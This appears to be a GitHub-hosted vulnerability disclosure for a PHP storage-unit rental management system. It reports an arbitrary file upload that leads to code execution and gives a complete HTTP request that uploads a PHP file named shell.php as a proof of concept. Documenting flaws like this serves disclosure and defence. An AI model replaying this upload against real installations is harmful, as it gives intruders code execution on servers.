Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Storage Unit Rental Management System v1.0 by oretnom23 has arbitrary code execution (RCE)

BUG_Author: qingning988

vendors: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability url: ip/storage/classes/SystemSettings.php?f=update_settings

Loophole location: Storage Unit Rental Management System's "/storage/classes/SystemSettings.php?f=update_settings" file exists arbitrary file upload (RCE)

Request package for file upload:

POST /storage/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/storage/admin/?page=system_info
Content-Length: 616
Content-Type: multipart/form-data; boundary=---------------------------17775797415769
Cookie: PHPSESSID=7hamglse0h7kpa6fbhgomf5j84
Connection: close

-----------------------------17775797415769
Content-Disposition: form-data; name="name"

Storage Unit Rental Management System - PHP
-----------------------------17775797415769
Content-Disposition: form-data; name="short_name"

SURMS - PHP
-----------------------------17775797415769
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------17775797415769
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


-----------------------------17775797415769--

The files will be uploaded to this directory \storage\uploads image

We visited the directory of the file in the browser and found that the code had been executed image